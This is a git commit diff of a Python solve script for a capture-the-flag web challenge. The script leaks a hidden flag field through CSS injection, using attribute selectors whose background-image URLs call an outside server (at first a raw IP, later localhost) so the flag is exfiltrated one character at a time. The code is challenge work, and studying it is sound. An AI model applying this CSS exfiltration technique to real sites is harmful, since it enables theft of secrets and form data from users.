more ctf stuff

This commit is contained in:
2025-09-20 21:10:36 +02:00
parent 443a793e6b
commit e0ed1e486b
92 changed files with 14630 additions and 7 deletions

View File

@@ -6,7 +6,8 @@ from urllib.parse import unquote
chars = string.ascii_uppercase + string.digits + "f"
url = "http://challs2.nusgreyhats.org:33339"
url = "http://localhost:33339"
exfiltrate_server = "http://localhost:8000"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
@@ -21,12 +22,11 @@ class LeakHandler(BaseHTTPRequestHandler):
print("Next round")
leak_char(leaked_password)
def generate_css_input(leaked_password):
css_input = ""
for a in chars:
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}'
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url({exfiltrate_server}/{leaked_password + a});}}'
return css_input
@@ -41,7 +41,7 @@ def leak_char(leaked_password):
if match:
id_value = match.group(1)
print("Found ID:", id_value)
r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}")
r = requests.post(f"{url}/judge/{id_value}")
print(r.text)
else:
print("error")